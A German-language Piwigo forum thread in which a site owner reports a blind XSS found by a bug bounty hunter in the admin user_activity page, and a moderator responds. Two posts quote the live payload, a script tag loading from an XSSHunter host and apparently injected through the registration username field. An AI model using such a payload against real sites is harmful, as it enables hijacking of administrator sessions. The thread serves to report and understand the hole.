Ankündigung

  •  » Diskussion
  •  » blind XSS in admin dashboard

#1 2022-04-13 08:29:35

ChrisJeker
Gast

blind XSS in admin dashboard

Hallo
Ich habe eine Meldung bekommen, dass auf meiner Seite mit Piwigo 12.2.0 eine Blind XSS gemacht werden konnte.
Dies habe ich bekommen:
Report Summary
I'm using XSSHunter tool for testing for Blind XSS, and it has been trigered and I got an email that payload has executed.
Vulnerable Page URL: https://<removed>_photos/admin.php?page=user_activity

Vieleicht kann sich dies jemand mit Know-How anschauen.

Danke und Gruss
Chris

#2 2022-04-13 11:36:09

drlecter
Piwigo Team Moderators
2016-03-17
1031

Re: blind XSS in admin dashboard

Wenn ich bei meiner URL /admin.php?page=user_activity anfüge werde ich automatisch auf die Login Seite umgeleitet.
Von wem kam denn diese Nachricht?

Offline

#3 2022-04-22 14:45:59

ChrisJeker
Mitglied
2022-04-22
2

Re: blind XSS in admin dashboard

Das hat mir ein BugBounty Jäger zukommen lassen.

Wie genau weiss ich auch nicht. Anscheinend hat er das Tool XSSHunter benutzt und auf meiner Seite dieses Skript ausführen können, so dass er die in die Verwaltung rein gekommen ist:
Siehe den Text auf https://v4yne1.xss.ht/ dazu.


<html lang="de" dir="ltr" class=" rzlnaok idc0_338"><head><script async="" src="https://v4yne1.xss.ht/?_=1648818976877"></script>
<meta name="apple-itunes-app" content="app-id=472225196">
<meta charset="utf-8">
<title>Fam.Jeker@gmx.net Piwigo-Fotogalerie :: Piwigo-Verwaltung</title>
<link rel="icon" type="image/svg+xml" href="themes/default/icon/piwigo.org-icon 1.svg">
<link rel="stylesheet" type="text/css" href="admin/themes/default/fonts/open-sans/open-sans.css">

Offline

#4 2022-04-22 15:17:53

ChrisJeker
Mitglied
2022-04-22
2

Re: blind XSS in admin dashboard

ich habe gerade noch gesehen, dass sich dieser als user eingeloggt hat

  <div class="detail-section">
                <div class="detail-item detail-item-1" title="IP">###########</div>
                <div class=" detail-item detail-item-2" title="Script">register</div>
                <div class="detail-item detail-item-3" title="&quot;><script src=https://v4yne1.xss.ht></script>">"&gt;<script src="https://v4yne1.xss.ht"></script></div>

Anscheinend hat er als Benutzernamen das script genommen?? sollte ja aber nicht gehen??? Ich weiss auch nicht

Offline

#5 2022-04-23 11:51:39

drlecter
Piwigo Team Moderators
2016-03-17
1031

Re: blind XSS in admin dashboard

Ich habe mir das Tool mal angeschaut. Was hat er dir alles in der Mail geschickt? Da könnte auch etwas wie Injection Key drin stehen.
Ich denke mit den Info sollte man einmal im englischen Forum nachschauen, da die Entwickler sich da tummeln.
Sonst währe mal die komplette Mail etwas hilfreicher.

Offline

  •  » Diskussion
  •  » blind XSS in admin dashboard

Brett Fußzeile

Unterstützt von FluxBB

github twitter newsletter Spenden Piwigo.org © 2002-2024 · Kontakt